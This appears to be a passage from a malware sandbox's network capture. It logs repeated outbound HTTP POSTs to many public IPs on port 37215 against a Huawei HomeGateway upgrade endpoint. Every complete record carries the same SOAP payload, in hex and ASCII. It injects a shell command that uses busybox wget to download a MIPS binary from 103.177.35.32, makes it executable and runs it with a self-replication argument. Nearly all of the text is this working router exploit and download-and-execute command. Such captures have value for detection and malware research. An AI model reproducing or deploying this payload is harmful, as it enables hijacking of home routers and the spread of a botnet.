                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1875192.168.2.235080841.100.120.037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.608542919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1876192.168.2.2336954157.227.52.20037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.608566046 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1877192.168.2.233473841.175.43.4037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.608634949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1878192.168.2.2341900197.197.191.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.608653069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1879192.168.2.2336586197.89.43.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.609040022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1880192.168.2.233396241.60.174.21737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.609090090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1881192.168.2.2341166157.127.177.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.609822035 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1882192.168.2.2339458157.80.55.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.609863043 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1883192.168.2.2359310197.206.131.24937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.610321999 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1884192.168.2.2335864157.206.104.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.610322952 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
